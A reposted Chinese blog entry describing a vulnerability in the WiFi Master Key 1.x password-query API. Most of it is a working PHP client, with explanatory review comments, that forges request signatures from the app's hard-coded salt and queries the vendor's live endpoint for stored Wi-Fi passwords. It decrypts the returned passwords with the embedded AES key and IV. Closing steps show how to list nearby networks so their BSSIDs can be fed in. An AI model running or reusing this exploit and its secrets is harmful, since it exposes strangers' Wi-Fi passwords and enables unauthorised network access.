
WIFI万能钥匙密码查询接口

WIFI万能钥匙密码查询接口

拜读了《WIFI万能钥匙密码查询接口算法破解(可无限查询用户AP明文密码)》 http://www.wooyun.org/bugs/wooyun-2015-099268 一文

通过程序包分析算法(说一句,各种key、salt都是明文存储,连混淆甚至简单的字符拼接都没有……)

这个是查询密码用到的数据包,以及参数中sign(签名)的算法,其实就是把这些数据进行排序后用salt算个md5。新版本的万能钥匙还有个retSn,实现链式认证,也能突破,但这个报告只说1.x版本的API问题(1.x时期很多细节显然没有考虑完善,基本只靠sign做安全)

<?php
//some code from http://www.wooyun.org/bugs/wooyun-2015-099268
//
// Demonstration client for the WiFi Master Key 1.x password-query API described
// in the report above. Apart from retSn, which the server returns, every value
// the request depends on (device ids, signing salt, AES key and IV) is a
// constant in this file. That is the weakness the write-up describes: a
// signature computed from secrets shipped in the client does not authenticate
// the caller, and a fixed key/IV makes the password encryption reversible by
// anyone who has the app.

// Access point to look up: BSSID and SSID.
$bssid = "c8:3a:35:fa:b8:80";
$ssid = "Podinns2F03";

// Both variables are assigned just above, so this guard is always true here.
if(isset($bssid) && isset($ssid)){
//update salt
    // First call: signed with an arbitrary salt (md5 of a small random number);
    // only the retSn field of its decoded response is used afterwards.
    // NOTE(review): neither the cURL result nor json_decode() is checked. If a
    // request fails, $ret is null and the property reads below raise warnings;
    // the loose "== 0" comparisons also match null.
    $ret = request($bssid, $ssid, md5(rand(1, 10000)));
    $ret = json_decode($ret);

    // Second call: signed with the retSn value returned by the first call.
    $ret = request($bssid, $ssid, $ret->retSn);
    $ret = json_decode($ret);
    // retCd 0 is treated as success at both the envelope and the qryapwd level.
    if($ret->retCd == 0){
        if($ret->qryapwd->retCd == 0){
            $list = $ret->qryapwd->psws;
            foreach($list as $wifi){
                echo 'SSID: '.$wifi->ssid."\n";
                // pwd arrives hex-encoded and AES-encrypted; see decryptStrin().
                echo 'PWD: '.decryptStrin($wifi->pwd)."\n";
                echo 'BSSID: '.$wifi->bssid."\n";
                // NOTE(review): xUser is read without isset(); if the field is
                // absent from an entry PHP emits a warning.
                if($wifi->xUser){
                    echo 'xUser: '.$wifi->xUser."\n";
                    echo 'xPwd: '.$wifi->xPwd."\n";
                }
            }
        }
        else{
            // Non-zero qryapwd->retCd: print the message from the response.
            echo $ret->qryapwd->retMsg;
        }
    }
}

/**
 * Build the fixed parameter set for a query, sign it and POST it with cURL.
 *
 * @param string $bssid BSSID placed in the 'bssid' field.
 * @param string $ssid  SSID placed in the 'ssid' field.
 * @param string $salt  Value appended to the concatenated fields before hashing (see sign()).
 * @param string $dhid  Value of the 'dhid' field; presumably a device id — confirm against the write-up.
 * @return string|false Raw response body, or false if curl_exec() fails.
 */
function request($bssid, $ssid, $salt, $dhid = 'ff8080814cc5798a014ccbbdfa375369'){
    $data = array();
    $data['appid'] = '0008';
    $data['bssid'] = $bssid;
    $data['chanid'] = 'gw';
    $data['dhid'] = $dhid;
    $data['ii'] = '609537f302fc6c32907a935fb4bf7ac9';
    $data['lang'] = 'cn';
    $data['mac'] = '60f81dad28de';
    $data['method'] = 'getDeepSecChkSwitch';
    $data['pid'] = 'qryapwd:commonswitch';
    $data['ssid'] = $ssid;
    $data['st'] = 'm';
    $data['uhid'] = 'a0000000000000000000000000000001';
    $data['v'] = '324';
    // The signature is computed over the fields set so far, then added as a field itself.
    $data['sign'] = sign($data, $salt);

    $curl = curl_init();
    // Plain http:// endpoint: request parameters and the response are sent unencrypted.
    curl_setopt($curl, CURLOPT_URL, 'http://wifiapi02.51y5.net/wifiapi/fa.cmd');
    curl_setopt($curl, CURLOPT_USERAGENT,'WiFiMasterKey/1.1.0 (Mac OS X Version 10.10.3 (Build 14D136))');
    // No effect on the http:// URL above. Because redirects are followed (below),
    // a redirect to https would be accepted without certificate validation.
    curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false); // stop verifying certificate
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($curl, CURLOPT_POST, true); // enable posting
    curl_setopt($curl, CURLOPT_POSTFIELDS, http_build_query($data)); // form-encoded parameters as the POST body
    curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true); // follow HTTP redirects
    $r = curl_exec($curl);
    curl_close($curl);
    return $r;
}

/**
 * Build and sign the same parameter set as request() using a hard-coded salt.
 *
 * NOTE(review): this function is never called in the visible code, sends nothing
 * and returns nothing. $bssid, $dhid and $ssid are not defined in its scope
 * (PHP functions do not see the script's globals), so they evaluate to null
 * with a warning.
 */
function registerNewDevice(){
    // Static signing salt embedded in the client; presumably the value recovered
    // from the app package, where per the write-up keys and salts sit in plaintext.
    $salt = '1Hf%5Yh&7Og$1Wh!6Vr&7Rs!3Nj#1Aa$';

    $data = array();
    $data['appid'] = '0008';
    $data['bssid'] = $bssid;
    $data['chanid'] = 'gw';
    $data['dhid'] = $dhid;
    $data['ii'] = '609537f302fc6c32907a935fb4bf7ac9';
    $data['lang'] = 'cn';
    $data['mac'] = '60f81dad28de';
    $data['method'] = 'getDeepSecChkSwitch';
    $data['pid'] = 'qryapwd:commonswitch';
    $data['ssid'] = $ssid;
    $data['st'] = 'm';
    $data['uhid'] = 'a0000000000000000000000000000001';
    $data['v'] = '324';
    $data['sign'] = sign($data, $salt);
}

/**
 * Compute the request signature: uppercase MD5 of all values, ordered by key,
 * followed by the salt.
 *
 * The values are concatenated without delimiters, and the only secret input is
 * the salt, so whoever knows the salt can produce a valid signature for any
 * parameter set.
 *
 * @param array  $array Request parameters (key => value).
 * @param string $salt  Value appended after the concatenated parameters.
 * @return string 32-character uppercase hex MD5 digest.
 */
function sign( $array , $salt ){
    // Signature algorithm
    $request_str = '';
    // Corresponds to the Arrays.sort call in the APK; when testing in PHP, ksort must be used
    ksort( $array );
    foreach ($array as $key => $value) {
        $request_str .= $value;
    }
    $sign = md5( $request_str . $salt );
    return strtoupper($sign);
}

/**
 * Decrypt a hex-encoded password field from the API response.
 *
 * The key and IV defaults are fixed constants, so the encryption only obscures
 * the password: every holder of the client can reverse it.
 *
 * NOTE(review): the mcrypt extension was deprecated in PHP 7.1 and removed from
 * core in 7.2, so this function only runs where mcrypt is still installed.
 *
 * @param string $str        Hex string as found in the 'pwd' field.
 * @param string $keys       16-byte AES key.
 * @param string $iv         16-byte CBC initialisation vector.
 * @param string $cipher_alg mcrypt cipher name; defaults to MCRYPT_RIJNDAEL_128.
 * @return string Decrypted text with the leading 3 and trailing 13 characters removed.
 */
function decryptStrin($str,$keys='k%7Ve#8Ie!5Fb&8E',$iv='y!0Oe#2Wj#6Pw!3V',$cipher_alg=MCRYPT_RIJNDAEL_128){
    // Wi-Fi Master Key encrypts passwords with AES/CBC/NoPadding
    //[length][password][timestamp]
    // pack("H*") turns the hex string into raw bytes before decryption.
    $decrypted_string = mcrypt_decrypt($cipher_alg, $keys, pack("H*",$str),MCRYPT_MODE_CBC, $iv);
    // trim() drops surrounding whitespace and NUL bytes; substr() then cuts the
    // first 3 and last 13 characters — presumably the [length] prefix and the
    // [timestamp] suffix of the layout above.
    return substr(trim($decrypted_string),3,-13);
}
?>

说明:如何检查附近的WIFI

在 powershell 或 cmd 中执行 netsh wlan show network mode=bssid,将结果粘贴进去

air用户则

执行airport -s,将结果粘贴进去
如果提示没有airport,先执行

sudo ln -s /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport

/usr/sbin/airport

我们去查询huipu那个~

【via@Internet转载】 本文作者身份不详,请作者看到文章后在文末留下联系方式,谢谢!
